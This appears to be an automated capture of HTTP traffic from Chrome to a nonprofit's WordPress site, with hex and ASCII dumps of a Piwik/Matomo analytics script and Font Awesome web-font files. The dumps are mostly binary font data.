                                                                                                                                                                                                                              CDN-Cache: HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC7240INData Raw: 2f 2a 21 21 0a 20 2a 20 50 69 77 69 6b 20 2d 20 66 72 65 65 2f 6c 69 62 72 65 20 61 6e 61 6c 79 74 69 63 73 20 70 6c 61 74 66 6f 72 6d 0a 20 2a 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 74 72 61 63 6b 69 6e 67 20 63 6c 69 65 6e 74 0a 20 2a 0a 20 2a 20 40 6c 69 6e 6b 20 68 74 74 70 73 3a 2f 2f 70 69 77 69 6b 2e 6f 72 67 0a 20 2a 20 40 73 6f 75 72 63 65 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 74 6f 6d 6f 2d 6f 72 67 2f 6d 61 74 6f 6d 6f 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 6a 73 2f 70 69 77 69 6b 2e 6a 73 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 70 69 77 69 6b 2e 6f 72 67 2f 66 72 65 65 2d 73 6f 66 74 77 61 72 65 2f 62 73 64 2f 20 42 53 44 2d 33 20 43 6c 61 75 73 65 20 28 61 6c 73 6f 20 69 6e 20 6a 73 2f
                                                                                                                                                                                                                              Data Ascii: /*!! * Piwik - free/libre analytics platform * * JavaScript tracking client * * @link https://piwik.org * @source https://github.com/matomo-org/matomo/blob/master/js/piwik.js * @license https://piwik.org/free-software/bsd/ BSD-3 Clause (also in js/
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC16384INData Raw: 28 61 64 3c 33 32 29 7b 48 28 29 7d 65 6c 73 65 7b 69 66 28 61 64 3d 3d 39 32 29 7b 61 64 3d 61 68 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 47 29 3b 73 77 69 74 63 68 28 61 64 29 7b 63 61 73 65 20 39 32 3a 63 61 73 65 20 33 34 3a 63 61 73 65 20 34 37 3a 63 61 73 65 20 39 38 3a 63 61 73 65 20 31 31 36 3a 63 61 73 65 20 31 31 30 3a 63 61 73 65 20 31 30 32 3a 63 61 73 65 20 31 31 34 3a 61 67 2b 3d 6c 5b 61 64 5d 3b 47 2b 2b 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 31 37 3a 61 65 3d 2b 2b 47 3b 66 6f 72 28 61 63 3d 47 2b 34 3b 47 3c 61 63 3b 47 2b 2b 29 7b 61 64 3d 61 68 2e 63 68 61 72 43 6f 64 65 41 74 28 47 29 3b 69 66 28 21 28 61 64 3e 3d 34 38 26 26 61 64 3c 3d 35 37 7c 7c 61 64 3e 3d 39 37 26 26 61 64 3c 3d 31 30 32 7c 7c 61 64 3e 3d 36 35 26 26 61 64 3c
                                                                                                                                                                                                                              Data Ascii: (ad<32){H()}else{if(ad==92){ad=ah.charCodeAt(++G);switch(ad){case 92:case 34:case 47:case 98:case 116:case 110:case 102:case 114:ag+=l[ad];G++;break;case 117:ae=++G;for(ac=G+4;G<ac;G++){ad=ah.charCodeAt(G);if(!(ad>=48&&ad<=57||ad>=97&&ad<=102||ad>=65&&ad<
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC16384INData Raw: 54 5f 54 41 52 47 45 54 5f 43 4c 41 53 53 29 3b 69 66 28 61 70 29 7b 72 65 74 75 72 6e 20 61 70 7d 7d 2c 66 69 6e 64 54 61 72 67 65 74 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 61 6f 29 7b 76 61 72 20 61 70 3d 74 68 69 73 2e 66 69 6e 64 54 61 72 67 65 74 4e 6f 64 65 4e 6f 44 65 66 61 75 6c 74 28 61 6f 29 3b 69 66 28 61 70 29 7b 72 65 74 75 72 6e 20 61 70 7d 72 65 74 75 72 6e 20 61 6f 7d 2c 66 69 6e 64 43 6f 6e 74 65 6e 74 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 61 70 29 7b 69 66 28 21 61 70 29 7b 72 65 74 75 72 6e 7d 76 61 72 20 61 74 3d 61 65 2e 66 69 6e 64 46 69 72 73 74 4e 6f 64 65 48 61 76 69 6e 67 41 74 74 72 69 62 75 74 65 57 69 74 68 56 61 6c 75 65 28 61 70 2c 74 68 69 73 2e 43 4f 4e 54 45 4e 54 5f 4e 41 4d 45 5f 41 54 54 52 29 3b 69 66 28 61 74
                                                                                                                                                                                                                              Data Ascii: T_TARGET_CLASS);if(ap){return ap}},findTargetNode:function(ao){var ap=this.findTargetNodeNoDefault(ao);if(ap){return ap}return ao},findContentName:function(ap){if(!ap){return}var at=ae.findFirstNodeHavingAttributeWithValue(ap,this.CONTENT_NAME_ATTR);if(at
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC16384INData Raw: 64 6c 3d 4a 53 4f 4e 5f 50 49 57 49 4b 2e 70 61 72 73 65 28 64 6c 29 3b 69 66 28 57 28 64 6c 29 29 7b 72 65 74 75 72 6e 20 64 6c 7d 7d 63 61 74 63 68 28 64 6d 29 7b 7d 7d 72 65 74 75 72 6e 5b 22 22 2c 22 22 2c 30 2c 22 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 62 77 28 64 6d 29 7b 76 61 72 20 64 6c 3d 22 74 65 73 74 76 61 6c 75 65 22 3b 64 67 28 22 74 65 73 74 22 2c 64 6c 2c 31 30 30 30 30 2c 6e 75 6c 6c 2c 64 6d 29 3b 69 66 28 61 44 28 22 74 65 73 74 22 29 3d 3d 3d 64 6c 29 7b 62 59 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 64 6d 29 3b 72 65 74 75 72 6e 20 74 72 75 65 7d 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 75 6e 63 74 69 6f 6e 20 61 46 28 29 7b 76 61 72 20 64 6d 3d 62 6c 3b 62 6c 3d 66 61 6c 73 65 3b 76 61 72 20 64 6c 2c 64 6e 3b 66 6f 72 28 64 6c 3d 30 3b
                                                                                                                                                                                                                              Data Ascii: dl=JSON_PIWIK.parse(dl);if(W(dl)){return dl}}catch(dm){}}return["","",0,""]}function bw(dm){var dl="testvalue";dg("test",dl,10000,null,dm);if(aD("test")===dl){bY("test",null,dm);return true}return false}function aF(){var dm=bl;bl=false;var dl,dn;for(dl=0;
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC14036INData Raw: 73 49 6e 43 6f 6f 6b 69 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 62 51 3d 74 72 75 65 7d 3b 74 68 69 73 2e 73 65 74 4c 69 6e 6b 54 72 61 63 6b 69 6e 67 54 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 6c 29 7b 62 4a 3d 64 6c 7d 3b 74 68 69 73 2e 67 65 74 4c 69 6e 6b 54 72 61 63 6b 69 6e 67 54 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 4a 7d 3b 74 68 69 73 2e 73 65 74 44 6f 77 6e 6c 6f 61 64 45 78 74 65 6e 73 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 64 6c 29 7b 69 66 28 77 28 64 6c 29 29 7b 64 6c 3d 64 6c 2e 73 70 6c 69 74 28 22 7c 22 29 7d 63 38 3d 64 6c 7d 3b 74 68 69 73 2e 61 64 64 44 6f 77 6e 6c 6f 61 64 45 78 74 65 6e 73 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 64 6d 29 7b 76 61 72 20 64 6c 3b 69 66 28 77 28 64 6d 29 29 7b
                                                                                                                                                                                                                              Data Ascii: sInCookie=function(){bQ=true};this.setLinkTrackingTimer=function(dl){bJ=dl};this.getLinkTrackingTimer=function(){return bJ};this.setDownloadExtensions=function(dl){if(w(dl)){dl=dl.split("|")}c8=dl};this.addDownloadExtensions=function(dm){var dl;if(w(dm)){


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              96192.168.2.649828141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC779OUTGET /wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/css/all.min.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 117372
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:04:16 GMT
                                                                                                                                                                                                                              ETag: "66f569e0-1ca7c"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e198d06b38-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC941INData Raw: 77 4f 46 32 00 01 00 00 00 01 ca 7c 00 0a 00 00 00 03 14 3d 00 01 ca 31 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 54 00 a5 7e ca 8b d6 7c cb 90 58 05 88 1d 07 20 25 1e 8a 71 eb 80 d4 e0 3c 00 00 d4 d6 9f 07 65 44 d6 69 7b 00 54 55 55 6f 09 c1 dd ab f6 1f 20 fc f4 cb 6f 7f f8 d3 5f fe f6 8f 7f fd e7 7f 7f 19 18 bb 03 62 d9 8e eb f9 86 ff af fd b2 f3 ee cc 0f 30 bb d8 85 5e 20 76 04 6a 75 2f d8 65 61 22 64 54 2a b2 cb 4f f9 95 80 2e 08 6f 09 37 cb 60 a2 d7 89 02 2f ea bc 9a f3 22 e6 65 d2 17 23 c9 95 32 85 07 a8 3f b1 f7 eb 60 0a 43 2b f0 04 38 55 16 ca 1c 2e 4b 20 e6 22 47 07 00 cf 12 23 44 76 36 2d ff df 3b ad fe de 12 94 4a aa 92 2d 0b ca 10 b0 ad 58 0a 50 59 b1 94 b8 c9 9d 4e 0f 60 86 e8 c4 fb
                                                                                                                                                                                                                              Data Ascii: wOF2|=16$ `T~|X %q<eDi{TUUo o_b0^ vju/ea"dT*O.o7`/"e#2?`C+8U.K "G#Dv6-;J-XPYN`
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: d8 69 bb 0f 1c 3b 7e a4 15 5a 79 07 22 cb 35 79 8e d5 f0 c3 98 03 d7 2e 9d 21 d1 eb 3e 8e 65 2b 70 b2 97 79 62 07 6d 1a e8 01 8b 40 f0 25 4b 60 81 32 8b 60 d1 77 2d 51 63 01 0c df b5 e0 5b 16 7c d7 a2 6f 1f 6b d0 2f 94 71 84 3a 1a e5 61 cd ff 95 c0 f3 14 8b be d1 ae a9 e7 52 9d 21 ed 34 7a 64 a3 49 17 f5 bc 6f 6f 32 36 ab b1 a8 f7 b7 2e fa 96 a0 42 6d a8 da 29 96 25 82 6e 4b 64 0a e7 69 9b a2 af 8c 2f 4e be ad c3 3e db 99 d8 4f 10 14 0b 2a da 5a 53 21 a8 51 ff 89 60 52 af 1d 7d b3 4e e4 de 1e e4 af e3 e2 bb c2 d7 15 18 10 54 eb 84 a6 27 63 8c 1b c4 98 6f ab 39 41 d0 ae 88 c6 c4 36 59 e7 68 91 25 4a 74 31 ce 96 ef d4 0d 64 a6 8e 9b 2f 0b ac 95 fd ba ef e3 bd 35 8e b1 48 5e 81 6a 8b ed 79 d5 c8 c3 5c 5d 6f f3 6d 76 8a 2c f4 1f 47 f2 63 a0 0f 3b a5 42 b6 f8
                                                                                                                                                                                                                              Data Ascii: i;~Zy"5y.!>e+pybm@%K`2`w-Qc[|ok/q:aR!4zdIoo26.Bm)%nKdi/N>O*ZS!Q`R}NT'co9A6Yh%Jt1d/5H^jy\]omv,Gc;B
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: c3 74 84 8e d3 79 ba 4d 6f e8 0b a9 dc 85 07 f0 04 9e ce b3 78 3e 2f e2 15 bc 81 b7 f0 0e de cb a7 f9 3a df e2 bb 7c 8f ef f3 43 7e ce 2f f9 1b 3b 59 e3 7f fc 9f 99 75 ce 92 26 19 20 23 64 82 cc 23 f3 c9 fc b2 29 fd ed 2f 59 6a f2 bb 1e 7c e0 c1 c1 92 46 57 63 d2 5f 7d b9 b1 ce 38 66 9c 32 2e fd cd f9 66 24 79 ca 7a 6a fc f1 d2 ab 7a bf 79 3f 79 df 79 df c0 0f fb 30 67 a1 9c d9 73 c6 e7 8c c9 f1 3b 47 52 0e 67 8e 9b 39 ae 67 6f 9c 6d 52 b6 10 db 1f db 18 5b 0d 5b 8c cd df 7a de 7a ce 7a ca 9a d7 a2 59 0e 59 56 5b 5a 5a ea 59 2a 58 ca 5b 8a 58 0a 59 14 4b 10 00 80 f2 47 49 52 be 2a ef 95 9d ca 3a a5 df d5 af d8 eb 28 76 00 25 0f 80 12 07 a0 c4 2a 31 00 4a b4 12 ae 28 4a 98 12 a4 98 15 10 5e 91 29 32 04 8b ff 22 59 38 c5 4b f1 4c 3c 05 10 37 c5 55 71 49 5c
                                                                                                                                                                                                                              Data Ascii: tyMox>/:|C~/;Yu& #d#)/Yj|FWc_}8f2.f$yzjzy?yy0gs;GRg9gomR[[zzzYYV[ZZY*X[XYKGIR*:(v%*1J(J^)2"Y8KL<7UqI\
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 27 66 a2 1c 45 39 86 98 85 72 3c 4f 19 b3 53 4e a2 9c 46 cc 41 39 83 72 de 1d c9 35 2e 17 50 2e 24 16 a1 5c 42 b9 8c 58 8c 72 05 e5 6a 62 49 ca b5 94 3b 89 65 29 77 53 1e 21 d6 a2 3c ce 53 c4 26 94 a7 28 4f 13 9b 52 9e a5 05 b1 39 e5 b9 05 de a6 3c 3f 45 6c 41 79 91 f2 32 b1 25 e5 75 9a 22 b6 a1 bc 49 f9 98 d8 96 f2 19 8d 89 3d 28 5f 50 be be 6f ea 2b df 52 7e be 93 8a ca af db 82 38 84 f2 db 02 e7 53 ca 14 71 28 a5 a5 fc 49 1c 46 f9 8f ae 51 0c a3 f6 a1 f6 27 8e a6 0e a4 0e 27 8e a7 8e a6 4e 24 4e a3 4e a6 4e 41 9c 4b 9d 8a 16 c4 65 d4 69 c6 c4 20 ea b4 d4 39 7e 6d 2e aa ab f0 82 b8 99 ba e6 82 b8 85 ba de 82 b8 95 ba c1 82 b8 8d fa ce 14 71 3b f5 6b ea 37 c4 1d d4 6f 09 7d 4c ff 1d f5 4f e2 2e da 21 b4 e3 88 67 69 67 e6 05 c6 d0 ce b1 c0 58 da 79 17 18
                                                                                                                                                                                                                              Data Ascii: 'fE9r<OSNFA9r5.P.$\BXrjbI;e)wS!<S&(OR9<?ElAy2%u"I=(_Po+R~8Sq(IFQ''N$NNNAKei 9~m.q;k7o}LO.!gigXy
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: b7 12 df 97 4e d2 24 05 b2 b1 71 70 b0 b1 41 8e ff 9a e3 95 46 03 b1 d1 58 69 21 a8 34 46 ef c7 0c b1 d1 58 19 7d 83 9b 00 fe 2c 05 7c 2b ac 00 f8 49 9a d0 6c 85 48 bb 57 a1 3c 6b 8c 64 f3 df d9 1b 63 d9 2b 0f 1d a2 51 4b 70 be 39 98 61 34 1c 1e 4f 33 c0 91 cf 98 3d b0 04 e7 0e d1 e8 e2 f4 af 0d c4 8f b5 38 04 c0 d9 f7 6d b0 6e 1b c0 6f 53 aa 22 bf b3 53 14 b6 d8 6c e6 54 ac 29 90 af 4b d2 24 7d a2 5d 5d 40 ed b8 c5 b5 f3 17 97 57 08 ae bc e1 c3 7d ec 3c 83 90 51 f7 f3 12 51 ca 36 0e ab 8b a1 70 91 85 55 24 2b cb 17 cf af bd 7e 1c 17 f1 fd f2 e7 aa ed b6 94 88 e9 c7 1c e0 18 0e 00 fc 9d 42 a9 3c cb 54 56 e7 78 bc 49 b3 73 3b 4d 15 6e c7 44 52 aa 48 66 2a 2f 46 75 46 ac 32 7a cd c0 98 fb 3f 21 a3 a5 d7 46 fd 24 45 4c 93 fe 9d cd 7a a3 44 0c 5d e7 9c 73 4a
                                                                                                                                                                                                                              Data Ascii: N$qpAFXi!4FX},|+IlHW<kdc+QKp9a4O3=8mnoS"SlT)K$}]]@W}<QQ6pU$+~B<TVxIs;MnDRHf*/FuF2z?!F$ELzD]sJ
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: fb 0f 6c 9b 09 61 a3 da da 52 83 81 da da 72 55 1e f3 f2 e5 8d bd bd bd bd f5 fd 7d 9b 0b 9b 31 1c 66 3d b4 81 3b 03 63 93 0d 62 b8 e6 42 5e 16 67 b1 a7 04 84 42 33 94 5e ea 66 f3 0b 88 0b f3 59 f7 52 e3 1c 19 0f 87 c3 21 9a 5a 6c 2f 6c 21 5b 1f 5b a9 34 70 30 9d 68 6c 66 9c c4 7e 77 d5 b3 dd 80 a6 da 58 49 60 32 7b d2 51 dd 09 08 86 e3 b2 01 0b 11 27 36 8f 66 37 43 5d 6e bf 51 18 a1 6f 40 1d 88 3f 1b 39 bb 88 ac cd e3 7f e6 fa ff bc 09 8e a1 6f 54 d0 40 e4 c2 75 3d f8 e1 e8 02 9f 7f 29 49 4f f8 ab 77 6e 6d 8d bf bc 21 de d7 b5 c0 75 91 5d bc f8 b0 9d 1e e3 c1 0b 36 22 b3 b9 b0 d7 2f e1 d0 12 5d 5c 8a 77 6b f7 60 ae 2b 1f dc eb 13 b3 dd 10 29 98 10 b6 8d c8 96 b1 ad 6e 64 84 63 e8 02 74 c2 5e d8 48 03 b2 77 b4 55 32 ea c1 fb 16 2d 3e 3a 63 06 4f 0f 01 61
                                                                                                                                                                                                                              Data Ascii: laRrU}1f=;cbB^gB3^fYR!Zl/l![[4p0hlf~wXI`2{Q'6f7C]nQo@?9oT@u=)IOwnm!u]6"/]\wk`+)ndct^HwU2->:cOa
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: cf 7c c6 3f 79 ff be 3f 3b c1 d7 e1 18 92 f8 d7 d6 18 35 de 84 71 b0 75 83 80 59 7c fa ef 3f e8 50 77 9c 4e 02 66 71 0c 7f 10 7d 5d f5 fc f2 f4 a3 14 d9 f3 fc 12 de 16 10 2b 23 c0 67 5f c6 53 fc 0c 68 d9 ad ee b6 52 c6 f7 72 24 b7 43 9c 89 8b 9d 98 02 39 bd 88 0c 64 90 45 59 37 cb 22 fb 49 92 26 34 43 22 7b 30 5f 65 77 4a a4 dc 9b 14 b5 ce 2b b6 a9 39 b5 21 ae b9 3c ef 35 eb 8e 7a 35 0e 99 70 45 a0 73 af ec d7 a4 40 8c c3 d0 ac 49 82 88 38 f3 e5 09 56 eb 5b f5 ba 65 97 4b 95 75 6a cd 35 2e 6c d4 1b 1a 96 4b 19 b5 1d 74 1c d7 65 88 b6 ae 6b 96 95 84 14 09 ea 1a 0a 47 94 3d a6 23 c1 66 ab 28 0e 1e bd b2 5f a2 16 d3 71 b0 11 78 15 ba da c4 c5 28 0a 1a 71 44 30 6c b7 db e8 20 21 84 20 a2 83 24 92 65 cb d0 49 6d 63 23 e9 a0 36 37 b7 a8 55 7c 82 8e 6d a0 69 50
                                                                                                                                                                                                                              Data Ascii: |?y?;5quY|?PwNfq}]+#g_ShRr$C9dEY7"I&4C"{0_ewJ+9!<5z5pEs@I8V[eKuj5.lKtekG=#f(_qx(qD0l ! $eImc#67U|miP
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 45 d6 2b 19 fb b3 3b ef bc f3 4e 03 c0 76 a3 c8 be c4 d8 2b ad 28 f2 6c 00 13 1e f1 10 1d 2b f0 dd 97 3d ea fa 81 e5 20 7a 9f 95 ea 35 8f 3e fa e8 cb 5c 3f b0 1c 44 ef 33 52 7e ce 43 74 ac c0 77 89 20 7c ef 71 f8 45 f8 06 49 c8 21 72 15 b9 95 bc 8d bc 87 10 98 15 83 2c cf f2 22 2f fc b2 2a f3 22 8f b5 81 e4 7a 83 6c 5c 8c a5 9f 4c 5d b4 bc 9e 97 7e 39 c8 c6 52 ba e6 48 51 75 64 31 e9 9d bd 45 b5 a8 a4 af ea ca 7c 51 76 50 e4 f3 71 59 65 ba 92 45 b5 98 0f 18 b9 4b 63 39 89 65 79 aa 6e 5a 2d 8a 78 f4 57 94 f0 1a c6 5c 0f c1 34 e5 2b 40 29 c3 54 0a 9e 42 b9 d7 42 04 b0 82 bc 13 f3 4d 6a 20 05 21 a4 14 1c 60 1b a9 b3 63 39 96 a5 7c 69 18 d8 93 d2 d0 a9 4a 22 19 c7 ed 6d 9a 78 ae 8b 18 04 dd 51 18 99 e0 ba be c1 19 8b 2d d3 44 5a 4b 27 91 61 78 a6 e1 25 8c c3
                                                                                                                                                                                                                              Data Ascii: E+;Nv+(l+= z5>\?D3R~Ctw |qEI!r,"/*"zl\L]~9RHQud1E|QvPqYeEKc9eynZ-xW\4+@)TBBMj !`c9|iJ"mxQ-DZK'ax%
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 22 fa e5 4d 10 3f 51 6f 11 11 be d6 f7 4a b4 33 3f c8 04 a5 20 b5 81 0b 0a 19 63 01 57 be a1 b4 06 c3 68 3a 88 8e 03 68 df 99 69 10 9d 2f 3b 8e 43 b9 e0 ee 8b b3 d1 50 70 b6 75 1e f5 e1 70 c8 98 a9 19 bb c9 48 0d 43 81 b6 ed 20 b4 6c a1 90 6e 5b 75 c6 ea aa 96 8e 56 2c e1 79 1e d5 ae e0 f0 2f 77 32 0b e0 bc 5f 49 75 e7 81 e3 c5 ff b1 f7 0d 9d af 6f 42 c8 68 50 d4 a7 22 3a 14 a5 31 8a 46 4b 0b 58 47 cb 7e 39 2d 79 48 cf dc 14 ae 9c a8 da ad 71 39 1e 67 7d c1 6b f5 8d cd 69 2d 49 5c c7 71 d3 a4 96 3a ce 6d 68 ae 77 87 ff af f8 d2 6c 75 35 f4 2d ab 28 26 e5 d6 66 9a 88 3b a4 92 51 54 4b e3 50 2a a5 c2 b0 0e 17 4d 73 da 8e 80 10 24 64 4f 87 6a 3b 24 b6 9e 6a bf dd 43 93 f8 04 e6 d9 34 8b cb 29 5c 59 ee be f5 63 1f fb d8 c7 3e f6 fb ff f6 6f ff f6 6f 8f 3e fa
                                                                                                                                                                                                                              Data Ascii: "M?QoJ3? cWh:hi/;CPpupHC ln[uV,y/w2_IuoBhP":1FKXG~9-yHq9g}ki-I\q:mhwlu5-(&f;QTKP*Ms$dOj;$jC4)\Yc>oo>
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 50 00 1b c7 0a 8d 85 ad 6e 5a bb ac a5 80 ef 87 b5 94 c3 a5 f0 5c da f0 cc 2f 78 6d 7e 63 de de 13 f0 63 f8 02 69 91 09 b9 9d 3c 97 d3 69 d8 58 62 1b 92 5e bb 52 9a 36 dc 28 34 16 db 17 89 e2 28 4d ab 4a 56 13 b9 61 c7 d6 39 2b 95 20 2b 6d de 80 67 23 19 82 5f 40 39 7d 51 3e 06 1a f3 b2 9f 1f 39 be 58 f4 7a 00 bd de 62 71 7c f9 f3 c8 eb 56 92 54 3f cd e1 fa 3a ad 35 00 32 e9 b9 28 34 ba 9e 64 80 a0 e1 6c 67 7b 7b 67 bc be d6 fb f6 a0 df ef 6b ee fc 9d c0 83 87 2e c0 17 8e c7 63 3f 33 96 4f e9 6c 6e ce fb dd c0 44 10 52 08 26 af 53 4a 51 4a b9 e3 a0 d6 e8 38 9c 52 aa 58 b8 5e 6f 84 d1 70 b4 fc e6 bf ff fb bf 4b 26 84 14 80 66 af 5e bf f3 d0 61 16 99 63 a6 07 f1 12 a4 a4 43 4a 72 82 5c 24 0f 93 37 93 9f 26 a4 ca a6 59 51 96 96 9e 5b 0a 5f 96 4a 95 a6 ae 7c
                                                                                                                                                                                                                              Data Ascii: PnZ\/xm~cci<iXb^R6(4(MJVa9+ +mg#_@9}Q>9Xzbq|VT?:52(4dlg{{gk.c?3OlnDR&SJQJ8RX^opK&f^acCJr\$7&YQ[_J|


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              97192.168.2.649829141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC778OUTGET /wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/css/all.min.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 156496
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:04:16 GMT
                                                                                                                                                                                                                              ETag: "66f569e0-26350"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 602598
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e1bb3a2d41-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC941INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 50 00 0a 00 00 00 06 1a 05 00 02 63 04 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 20 cb ab 40 05 87 6d 07 20 25 02 0d 93 d6 01 d0 1a 56 27 00 00 aa bf 8d 87 11 29 9a 3d 3c 45 e4 ac d7 03 a0 aa aa aa aa aa a6 25 04 1c d7 b6 bd aa 0a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe e4 cf fe e2 af fe e6 ef fe e1 9f fe e5 df fe e3 bf fe e7 ff fe 53 60 30 ee fe 81 30 2d db 71 b9 3d 5e 9f df f0 2f 3f f6 7a 6e 0a 44 6f 2c 1c 70 46 a4 d0 81 42 f2 19 38 54 72 aa fe f9 1a 35 a1 db 6e fb 18 ff 51 97 3e cb be 00 a0 74 3a bf 9f 94 51 c5 09 98 53 e4 1d 01 d6 74 eb d8 ac 65 56 19 8d fc 9f 8a 29 e5 60 a2 49 67 62 22 ad b6 a8 98 bf dc 22 5a 49 32 7d 01 2c b2 83 aa
